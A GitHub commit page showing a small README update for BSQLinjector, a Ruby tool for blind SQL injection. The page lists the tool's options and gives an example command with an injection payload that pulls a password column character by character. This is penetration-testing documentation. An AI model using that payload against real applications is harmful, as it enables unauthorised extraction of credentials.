Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
@enjoiz
enjoiz committed Dec 20, 2015
1 parent 2b551f9 commit 37f29a6
Showing 1 changed file with 2 additions and 1 deletion.
3 changes: 2 additions & 1 deletion README.md
View file
Original file line number Diff line number Diff line change
@@ -1,6 +1,7 @@
BSQLinjector by Jakub Pałaczyński

BSQLinjector uses blind method to retrieve data from SQL databases.
I recommend using "--test" switch to clearly see how configured payload looks like before sending it to an application.

Options:
--file Mandatory - File containing valid HTTP request and SQL injection point (SQLINJECT). (--file=/tmp/req.txt)
Expand All @@ -27,4 +28,4 @@ Options:
--verbose Show verbose messages.

Example usage:
ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl
ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl

0 comments on commit 37f29a6

Please sign in to comment.